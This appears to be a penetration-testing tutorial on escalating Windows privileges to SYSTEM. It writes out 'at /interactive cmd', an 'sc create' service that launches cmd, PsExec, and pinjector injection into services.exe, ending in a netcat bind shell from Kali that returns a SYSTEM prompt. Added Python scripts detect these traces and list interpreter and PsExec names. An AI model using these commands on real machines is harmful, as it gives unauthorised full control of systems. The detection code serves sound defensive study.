Penetration Testing Privilege Escalation: Elevating Privileges with Windows System Commands and Process Injection
I. Local privilege escalation
• Starting point: a low-privileged local account login has already been obtained
    • via a remote overflow, or
    • by obtaining an account's credentials directly
• Goal: acquire higher privileges and gain further control of the target
• Privilege isolation between system accounts
    • the foundation of operating system security
    • user space
    • kernel space
• System accounts
    • a user account receives its access token when the user logs on
    • a service account needs no user login; its services are already started in the background
• Windows
    • user
    • Administrator
    • System
• Linux
    • User
    • Root
II. Escalating from Administrator to SYSTEM
HelpAssistant account
This account is created during system installation and is prepared for Remote Assistance operations; at creation it is assigned a random complex password and then disabled. When a Remote Assistance invitation is opened, an "invitation" ticket is created on the user's computer, port 3389 is opened to allow Terminal Services access, and the HelpAssistant account is enabled automatically. Once enabled, the invitee can use this account together with the created ticket to access the inviter's computer. When all tickets have been closed or have expired, the HelpAssistant account is automatically disabled again and port 3389 is closed at the same time.
Support_388945a0 account
This account exists so that the Help and Support service can interoperate with signed scripts. It is used mainly to control access to signed scripts (which can be accessed from inside the Help and Support service). An administrator can use this account to delegate to ordinary users (who have no administrative rights on the computer) the ability to run signed scripts from links embedded in the Help and Support service. These scripts can be programmed so that specific administrative operations are performed on the local computer with the credentials of the Support_388945a0 account rather than the user's own credentials, operations that an ordinary user account could not perform. When a delegated user clicks a link in the Help and Support service, the script runs in the security context of the Support_388945a0 account. The account has limited access to the computer and is disabled by default.
1. The at command
Only works on Windows XP and Windows Server 2003.
Help:
C:\Documents and Settings\Administrator>at /?
The AT command schedules commands and programs to run on a computer at a
specified time and date. The Schedule service must be running to use the AT
command.

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
    [ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername     Specifies a remote computer. Commands are scheduled on the
                   local computer if this parameter is omitted.
id                 Is an identification number assigned to a scheduled
                   command.
/delete            Cancels a scheduled command. If id is omitted, all the
                   scheduled commands on the computer are canceled.
/yes               Used with cancel all jobs command when no further
                   confirmation is desired.
time               Specifies the time when command is to run.
/interactive       Allows the job to interact with the desktop of the user
                   who is logged on at the time the job runs.
/every:date[,...]  Runs the command on each specified day(s) of the week or
                   month. If date is omitted, the current day of the month
                   is assumed.
/next:date[,...]   Runs the specified command on the next occurrence of the
                   day (for example, next Thursday). If date is omitted, the
                   current day of the month is assumed.
"command"          Is the Windows NT command, or batch program to be run.
Example:
C:\Documents and Settings\Administrator>at 12:11 /interactive cmd
# /interactive: run interactively (that is, the window is visible instead of running in the background)
Added a new job with job ID = 1

C:\Documents and Settings\Administrator>at
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Today                   12:11 PM      cmd
The cmd that opens at the scheduled time runs with SYSTEM privileges!
From that cmd, use taskmgr to kill the desktop process explorer.exe that currently runs under the Administrator account, then restart explorer; the whole desktop will then run under SYSTEM.
2. The sc command
Example
Create the service:
C:\Documents and Settings\Administrator>sc Create syscmd binPath= "cmd /K start" type= own type= interact
# syscmd: name of the service to create; binPath=: the command the service executes;
# cmd /K start: opens a new cmd window; type= own: a Win32 service running in its own process;
# type= interact: the service may interact with the desktop
[SC] CreateService SUCCESS
Start the service:
sc start syscmd
This is the command-line way to start a service. Services are started under the SYSTEM account by default, so when this command runs, syscmd is launched by the SYSTEM account.
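From the defender's side, both the at job and the sc service above leave the same footprint: a newly installed service or scheduled job whose command is a bare command interpreter, given without a full path, and running as LocalSystem. The Python script below is an added example (it is not part of the original post and not a Microsoft tool) that scans Service Control Manager "service was installed" records (System log, Event ID 7045) for that pattern. The event messages, the service names and paths in them, and the baseline rules are constructed for this example; the syscmd record mirrors the sc command shown above, and the PSEXESVC record mirrors the helper service PsExec installs.

```python
import re

# Constructed Event ID 7045 message texts, modelled on the real field layout
# (Service Name / Service File Name / Service Type / Service Start Type / Service Account).
SAMPLE_7045_EVENTS = [
    r"""Service Name:  syscmd
Service File Name:  cmd /K start
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    r"""Service Name:  VMTools
Service File Name:  "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
    r"""Service Name:  PSEXESVC
Service File Name:  C:\WINDOWS\PSEXESVC.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
]

FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.MULTILINE,
)

# Executables that should never be the image behind a legitimate service binPath.
INTERPRETERS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "cscript.exe", "wscript.exe", "mshta.exe"}
# Service names installed by remote-execution helpers (PsExec installs PSEXESVC).
REMOTE_EXEC_SERVICES = {"psexesvc"}


def parse_7045(message):
    """Return the field/value pairs of one Event ID 7045 message text."""
    return {field: value.strip() for field, value in FIELD_RE.findall(message)}


def image_basename(file_name):
    """Lower-cased executable name from a 'Service File Name' value (quoted or not)."""
    s = file_name.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end > 0 else s[1:]
    else:
        exe = s.split()[0] if s.split() else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_absolute_path(file_name):
    # True for drive-letter, UNC and NT-object (\??\) forms; False for a bare name resolved via PATH.
    s = file_name.strip().strip('"')
    return re.match(r"^(\\\?\?\\)?([A-Za-z]:\\|\\\\)", s) is not None


def assess_service_install(message):
    """Return (service name, list of reasons) for one 7045 record; an empty list means benign."""
    ev = parse_7045(message)
    name = ev.get("Service Name", "")
    file_name = ev.get("Service File Name", "")
    reasons = []
    if image_basename(file_name) in INTERPRETERS:
        reasons.append("service binary is a command interpreter")
    if file_name and not is_absolute_path(file_name):
        reasons.append("binary given without an absolute path")
    if name.lower() in REMOTE_EXEC_SERVICES:
        reasons.append("known remote-execution helper service (PsExec)")
    # Only worth stating once something else is already wrong: most services run as LocalSystem.
    if reasons and ev.get("Service Account", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return name, reasons


def flag_suspicious_services(messages):
    """Map service name -> reasons for every record that triggers at least one rule."""
    return {name: reasons for name, reasons in map(assess_service_install, messages) if reasons}


if __name__ == "__main__":
    for svc, why in flag_suspicious_services(SAMPLE_7045_EVENTS).items():
        print(f"{svc}: {'; '.join(why)}")
```

The at job path on XP leaves a different trace: the job file (At1.job and so on) under %SystemRoot%\Tasks and a line in the Task Scheduler log SchedLgU.txt; the same "is the command a bare interpreter" rule applies to the job's command line.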
3. Privilege escalation tools
The Sysinternals suite provided by Microsoft (downloading the whole suite and experimenting with it is recommended): https://docs.microsoft.com/zh-cn/sysinternals/downloads/
The specific tool used here: PsExec.exe
Help:
C:\>PsExec.exe

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.

Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd]][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...][-verbose] cmd [arguments]
     -a         Separate processors on which the application can run with commas
                where 1 is the lowest numbered CPU. For example, to run the
                application on CPU 2 and CPU 4, enter: "-a 2,4"
     -c         Copy the specified program to the remote system for execution. If
                you omit this option the application must be in the system path
                on the remote system.
     -d         Don't wait for process to terminate (non-interactive).
     -e         Does not load the specified account's profile.
     -f         Copy the specified program even if the file already exists on the
                remote system.
     -i         Run the program so that it interacts with the desktop of the
                specified session on the remote system. If no session is
                specified the process runs in the console session.
     -h         If the target system is Vista or higher, has the process run with
                the account's elevated token, if available.
     -l         Run process as limited user (strips the Administrators group and
                allows only privileges assigned to the Users group). On Windows
                Vista the process runs with Low Integrity.
     -n         Specifies timeout in seconds connecting to remote computers.
     -p         Specifies optional password for user name. If you omit this you
                will be prompted to enter a hidden password.
     -r         Specifies the name of the remote service to create or interact.
                with.
     -s         Run the remote process in the System account.
     -u         Specifies optional user name for login to remote computer.
     -v         Copy the specified file only if it has a higher version number or
                is newer on than the one on the remote system.
     -w         Set the working directory of the process (relative to remote
                computer).
     -x         Display the UI on the Winlogon secure desktop (local system
                only).
     -arm       Specifies the remote computer is of ARM architecture.
     -priority  Specifies -low, -belownormal, -abovenormal, -high or
                -realtime to run the process at a different priority. Use
                -background to run at low memory and I/O priority on Vista.
     computer   Direct PsExec to run the application on the remote
                computer or computers specified. If you omit the computer
                name PsExec runs the application on the local system,
                and if you specify a wildcard (\\*), PsExec runs the command
                on all computers in the current domain.
     @file      PsExec will execute the command on each of the computers listed
                in the file.
     cmd        Name of application to execute.
     arguments  Arguments to pass (note that file paths must be absolute paths
                on the target system).
     -accepteula This flag suppresses the display of the license dialog.
     -nobanner   Do not display the startup banner and copyright message.

You can enclose applications that have spaces in their name with quotation
marks e.g. psexec \\marklap "c:\long name app.exe".
Input is only passed to the remote system when you press the enter key, and
typing Ctrl-C terminates the remote process.
If you omit a user name the process will run in the context of your
account on the remote system, but will not have access to network
resources (because it is impersonating). Specify a valid user name in the
Domain\User syntax if the remote process requires access to network
resources or to run in a different account. Note that the password and
command is encrypted in transit to the remote system.
Error codes returned by PsExec are specific to the applications you
execute, not PsExec.
Example:
III. Privilege escalation by process injection
Principle: inject your own code into a SYSTEM service process so that it runs with the privileges of the SYSTEM account (very stealthy).
pinjector.exe process injector (external site): http://www.tarasco.org/security/Process_Injector/
Help:
C:\>pinjector.exe
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com
Usage:
    inject.exe -l (Enumerate Credentials)
    inject.exe -p <pid> <cmd> <port> (Inject into PID)
Example
List the processes that can be injected into:
C:\>pinjector.exe -l
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com
PID 564 smss.exe ( 3 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 612 csrss.exe ( 11 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 636 winlogon.exe ( 19 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 680 services.exe ( 16 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 692 lsass.exe ( 20 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 856 vmacthlp.exe ( 1 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 868 svchost.exe ( 19 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1064 svchost.exe ( 54 Threads) USER: \\NT AUTHORITY\SYSTEM
    001400: \\NT AUTHORITY\SYSTEM
    001412: \\NT AUTHORITY\SYSTEM
PID 1404 spoolsv.exe ( 11 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1592 HistorySvr.exe ( 4 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1616 inetinfo.exe ( 27 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1668 sntlkeyssrvr.exe ( 9 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1844 spnsrvnt.exe ( 7 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1864 SLadmin.exe ( 5 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1940 SLSmtp.exe ( 19 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1976 vmtoolsd.exe ( 4 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 192 VMUpgradeHelper.exe ( 3 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 3292 explorer.exe ( 5 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1768 explorer.exe ( 20 Threads) USER: \\DH-CA8822AB9589\Administrator
PID 3840 wscntfy.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator
PID 2172 VMwareTray.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator
PID 1516 VMwareUser.exe ( 8 Threads) USER: \\DH-CA8822AB9589\Administrator
PID 3176 ICQLite.exe ( 11 Threads) USER: \\DH-CA8822AB9589\Administrator
PID 3528 PSEXESVC.exe ( 3 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 2552 cmd.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator
PID 2420 pinjector.exe ( 1 Threads) USER: \\DH-CA8822AB9589\Administrator
Taking injection into the services.exe process as the example:
Test from Kali with nc
IP address of the XP machine:
Kali:
root@kali:~# nc 10.10.10.131 5555
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>
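The injection above installs no service and creates no new process, so a defender has to look at behaviour rather than at the service table. services.exe is the Service Control Manager and never binds a network socket of its own, so a LISTENING port owned by PID 680 is exactly the anomaly to catch. The script below is an added example (not part of the post and not part of pinjector) that joins a process-to-account listing in the layout that pinjector -l prints with netstat -ano output, and reports SYSTEM-owned processes that listen on a TCP port without being in a per-host baseline. The sample listing, the netstat lines, the Kali address 10.10.10.128, the ephemeral port 41422 and the baseline set are all constructed for this example; the PIDs and the port 5555 match the walkthrough.

```python
import re

# Constructed process listing, in the "PID <pid> <image> (<n> Threads) USER: <account>" layout.
PROCESS_LISTING = r"""
PID 680 services.exe ( 16 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 692 lsass.exe ( 20 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1064 svchost.exe ( 54 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1616 inetinfo.exe ( 27 Threads) USER: \\NT AUTHORITY\SYSTEM
PID 1768 explorer.exe ( 20 Threads) USER: \\DH-CA8822AB9589\Administrator
"""

# Constructed `netstat -ano` output for the same host; the 5555 rows are the state the
# injection into services.exe would leave behind once the nc client has connected.
NETSTAT_ANO = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1616
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1064
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       680
  TCP    10.10.10.131:5555      10.10.10.128:41422     ESTABLISHED     680
  UDP    0.0.0.0:445            *:*                                    4
"""

# Per-host baseline of SYSTEM images that legitimately listen (svchost for RPC, inetinfo
# for IIS, ...). Tune it to the host; services.exe is deliberately absent because the
# Service Control Manager never opens a listening socket itself.
EXPECTED_SYSTEM_LISTENERS = {"system", "svchost.exe", "lsass.exe", "inetinfo.exe", "spoolsv.exe"}

PROC_RE = re.compile(r"^PID\s+(\d+)\s+(\S+)\s+\(.*?\)\s+USER:\s+(\S.*)$")


def parse_process_listing(text):
    """Map PID -> (image name, owning account) from pinjector-style listing lines."""
    procs = {}
    for line in text.splitlines():
        m = PROC_RE.match(line.strip())
        if m:
            procs[int(m.group(1))] = (m.group(2), m.group(3).strip())
    return procs


def parse_listeners(text):
    """Return (local address, PID) for every TCP socket in LISTENING state."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        # UDP rows have no State column and so split into four fields; skip them and the header.
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
            listeners.append((parts[1], int(parts[4])))
    return listeners


def unexpected_system_listeners(process_text, netstat_text, baseline=EXPECTED_SYSTEM_LISTENERS):
    """SYSTEM-owned processes holding a listening TCP port that are not in the baseline."""
    procs = parse_process_listing(process_text)
    findings = []
    for local, pid in parse_listeners(netstat_text):
        image, account = procs.get(pid, ("<unknown>", "<unknown>"))
        if account.upper().endswith("\\SYSTEM") and image.lower() not in baseline:
            findings.append({"pid": pid, "image": image, "local": local})
    return findings


if __name__ == "__main__":
    for f in unexpected_system_listeners(PROCESS_LISTING, NETSTAT_ANO):
        print(f"ALERT: PID {f['pid']} ({f['image']}) running as SYSTEM is listening on {f['local']}")
```

The baseline is the weak point of this check: an image list copied from a clean build of the same host works, a generic list does not, so keep it per host or per image template.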